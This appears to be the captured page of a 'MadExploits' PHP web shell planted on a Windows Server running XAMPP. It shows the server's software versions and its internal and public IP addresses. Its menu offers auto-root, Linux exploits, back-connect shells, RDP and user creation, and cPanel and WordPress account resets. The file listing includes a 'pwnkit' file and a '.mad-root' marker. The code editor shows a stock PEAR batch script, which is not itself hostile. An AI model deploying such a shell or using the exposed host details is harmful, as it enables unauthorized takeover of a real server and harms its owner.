Windows NT IZOXMIX7871CBCZ 6.3 build 9600 (Windows Server 2012 R2 Datacenter Edition) AMD64
Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
: 172.23.17.241 | : 3.139.93.209
Cant Read [ /etc/named.conf ]
8.2.12
Administrator
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
[ C ]
C: /
xampp /
php /
[ HOME SHELL ]
Name
Size
Permission
Action
CompatInfo
[ DIR ]
drwxrwxrwx
cfg
[ DIR ]
drwxrwxrwx
data
[ DIR ]
drwxrwxrwx
dev
[ DIR ]
drwxrwxrwx
docs
[ DIR ]
drwxrwxrwx
ext
[ DIR ]
drwxrwxrwx
extras
[ DIR ]
drwxrwxrwx
lib
[ DIR ]
drwxrwxrwx
man
[ DIR ]
drwxrwxrwx
pear
[ DIR ]
drwxrwxrwx
scripts
[ DIR ]
drwxrwxrwx
tests
[ DIR ]
drwxrwxrwx
tmp
[ DIR ]
drwxrwxrwx
windowsXamppPhp
[ DIR ]
drwxrwxrwx
www
[ DIR ]
drwxrwxrwx
.mad-root
0
B
-rw-rw-rw-
CompatInfo.php
18.43
KB
-rw-rw-rw-
README.md
5.09
KB
-rw-rw-rw-
adminer.php
465.43
KB
-rw-rw-rw-
deplister.exe
134.5
KB
-rwxrwxrwx
glib-2.dll
1.54
MB
-rw-rw-rw-
gmodule-2.dll
18.5
KB
-rw-rw-rw-
icudt71.dll
29.01
MB
-rw-rw-rw-
icuin71.dll
2.89
MB
-rw-rw-rw-
icuio71.dll
59.5
KB
-rw-rw-rw-
icuuc71.dll
2.15
MB
-rw-rw-rw-
libcrypto-3-x64.dll
4.96
MB
-rw-rw-rw-
libenchant2.dll
41.5
KB
-rw-rw-rw-
libpq.dll
283
KB
-rw-rw-rw-
libsasl.dll
205
KB
-rw-rw-rw-
libsodium.dll
296.5
KB
-rw-rw-rw-
libsqlite3.dll
1.57
MB
-rw-rw-rw-
libssh2.dll
372
KB
-rw-rw-rw-
libssl-3-x64.dll
760
KB
-rw-rw-rw-
license.txt
3.2
KB
-rw-rw-rw-
news.txt
48.6
KB
-rw-rw-rw-
nghttp2.dll
226
KB
-rw-rw-rw-
pci
527
B
-rw-rw-rw-
pci.bat
568
B
-rwxrwxrwx
pci.css
1.23
KB
-rw-rw-rw-
pciconf
17.1
KB
-rw-rw-rw-
pciconf.bat
561
B
-rwxrwxrwx
pear.bat
4.26
KB
-rwxrwxrwx
peardev.bat
4.61
KB
-rwxrwxrwx
pecl.bat
4.55
KB
-rwxrwxrwx
phar.phar.bat
43
B
-rwxrwxrwx
pharcommand.phar
64.42
KB
-rw-rw-rw-
php-cgi.exe
67.5
KB
-rwxrwxrwx
php-win.exe
37.5
KB
-rwxrwxrwx
php.exe
139
KB
-rwxrwxrwx
php.ini
75.03
KB
-rw-rw-rw-
php.ini-development
73.92
KB
-rw-rw-rw-
php.ini-production
74.07
KB
-rw-rw-rw-
php8apache2_4.dll
35
KB
-rw-rw-rw-
php8embed.lib
912.23
KB
-rw-rw-rw-
php8phpdbg.dll
271
KB
-rw-rw-rw-
php8ts.dll
8.65
MB
-rw-rw-rw-
phpdbg.exe
273
KB
-rwxrwxrwx
phpunit
2.05
KB
-rw-rw-rw-
phpunit.bat
1.91
KB
-rwxrwxrwx
pwnkit
10.99
KB
-rw-rw-rw-
readme-redist-bins.txt
30.16
KB
-rw-rw-rw-
snapshot.txt
2.23
KB
-rw-rw-rw-
webdriver-test-example.php
1.41
KB
-rw-rw-rw-
Delete
Unzip
Zip
${this.title}
Close
Code Editor : peardev.bat
@ECHO OFF REM ---------------------------------------------------------------------- REM PHP version 5 REM ---------------------------------------------------------------------- REM Copyright (c) 1997-2004 The PHP Group REM ---------------------------------------------------------------------- REM This source file is subject to version 3.0 of the PHP license, REM that is bundled with this package in the file LICENSE, and is REM available at through the world-wide-web at REM http://www.php.net/license/3_0.txt. REM If you did not receive a copy of the PHP license and are unable to REM obtain it through the world-wide-web, please send a note to REM license@php.net so we can mail you a copy immediately. REM ---------------------------------------------------------------------- REM Authors: Alexander Merz (alexmerz@php.net) REM ---------------------------------------------------------------------- REM REM $Id: peardev.bat,v 1.6 2007-09-03 03:00:17 cellog Exp $ REM change this lines to match the paths of your system REM ------------------- REM Test to see if this is a raw pear.bat (uninstalled version) SET TMPTMPTMPTMPT=@includ SET PMTPMTPMT=%TMPTMPTMPTMPT%e_path@ FOR %%x IN ("C:\xampp\php\pear") DO (if %%x=="%PMTPMTPMT%" GOTO :NOTINSTALLED) REM Check PEAR global ENV, set them if they do not exist IF "%PHP_PEAR_INSTALL_DIR%"=="" SET "PHP_PEAR_INSTALL_DIR=C:\xampp\php\pear" IF "%PHP_PEAR_BIN_DIR%"=="" SET "PHP_PEAR_BIN_DIR=C:\xampp\php" IF "%PHP_PEAR_PHP_BIN%"=="" SET "PHP_PEAR_PHP_BIN=C:\xampp\php\php.exe" GOTO :INSTALLED :NOTINSTALLED ECHO WARNING: This is a raw, uninstalled pear.bat REM Check to see if we can grab the directory of this file (Windows NT+) IF %~n0 == pear ( FOR %%x IN (cli\php.exe php.exe) DO (if "%%~$PATH:x" NEQ "" ( SET "PHP_PEAR_PHP_BIN=%%~$PATH:x" echo Using PHP Executable "%PHP_PEAR_PHP_BIN%" "%PHP_PEAR_PHP_BIN%" -v GOTO :NEXTTEST )) GOTO :FAILAUTODETECT :NEXTTEST IF "%PHP_PEAR_PHP_BIN%" NEQ "" ( REM We can use this PHP to run a temporary php file to get the dirname of pear echo ^<?php $s=getcwd^(^);chdir^($a=dirname^(__FILE__^).'\\'^);if^(stristr^($a,'\\scripts'^)^)$a=dirname^(dirname^($a^)^).'\\';$f=fopen^($s.'\\~a.a','wb'^);echo$s.'\\~a.a';fwrite^($f,$a^);fclose^($f^);chdir^($s^);?^> > ~~getloc.php "%PHP_PEAR_PHP_BIN%" ~~getloc.php set /p PHP_PEAR_BIN_DIR=fakeprompt < ~a.a DEL ~a.a DEL ~~getloc.php set "PHP_PEAR_INSTALL_DIR=%PHP_PEAR_BIN_DIR%pear" REM Make sure there is a pearcmd.php at our disposal IF NOT EXIST %PHP_PEAR_INSTALL_DIR%\pearcmd.php ( IF EXIST %PHP_PEAR_INSTALL_DIR%\scripts\pearcmd.php COPY %PHP_PEAR_INSTALL_DIR%\scripts\pearcmd.php %PHP_PEAR_INSTALL_DIR%\pearcmd.php IF EXIST pearcmd.php COPY pearcmd.php %PHP_PEAR_INSTALL_DIR%\pearcmd.php IF EXIST %~dp0\scripts\pearcmd.php COPY %~dp0\scripts\pearcmd.php %PHP_PEAR_INSTALL_DIR%\pearcmd.php ) ) GOTO :INSTALLED ) ELSE ( REM Windows Me/98 cannot succeed, so allow the batch to fail ) :FAILAUTODETECT echo WARNING: failed to auto-detect pear information :INSTALLED REM Check Folders and files IF NOT EXIST "%PHP_PEAR_INSTALL_DIR%" GOTO PEAR_INSTALL_ERROR IF NOT EXIST "%PHP_PEAR_INSTALL_DIR%\pearcmd.php" GOTO PEAR_INSTALL_ERROR2 IF NOT EXIST "%PHP_PEAR_BIN_DIR%" GOTO PEAR_BIN_ERROR IF NOT EXIST "%PHP_PEAR_PHP_BIN%" GOTO PEAR_PHPBIN_ERROR REM launch pearcmd GOTO RUN :PEAR_INSTALL_ERROR ECHO PHP_PEAR_INSTALL_DIR is not set correctly. ECHO Please fix it using your environment variable or modify ECHO the default value in pear.bat ECHO The current value is: ECHO %PHP_PEAR_INSTALL_DIR% GOTO END :PEAR_INSTALL_ERROR2 ECHO PHP_PEAR_INSTALL_DIR is not set correctly. ECHO pearcmd.php could not be found there. ECHO Please fix it using your environment variable or modify ECHO the default value in pear.bat ECHO The current value is: ECHO %PHP_PEAR_INSTALL_DIR% GOTO END :PEAR_BIN_ERROR ECHO PHP_PEAR_BIN_DIR is not set correctly. ECHO Please fix it using your environment variable or modify ECHO the default value in pear.bat ECHO The current value is: ECHO %PHP_PEAR_BIN_DIR% GOTO END :PEAR_PHPBIN_ERROR ECHO PHP_PEAR_PHP_BIN is not set correctly. ECHO Please fix it using your environment variable or modify ECHO the default value in pear.bat ECHO The current value is: ECHO %PHP_PEAR_PHP_BIN% GOTO END :RUN "%PHP_PEAR_PHP_BIN%" -C -d date.timezone=UTC -d memory_limit="-1" -d safe_mode=0 -d register_argc_argv="On" -d auto_prepend_file="" -d auto_append_file="" -d variables_order=EGPCS -d open_basedir="" -d output_buffering=1 -d "include_path='%PHP_PEAR_INSTALL_DIR%'" -f "%PHP_PEAR_INSTALL_DIR%\pearcmd.php" -- %1 %2 %3 %4 %5 %6 %7 %8 %9 :END @ECHO ON
Close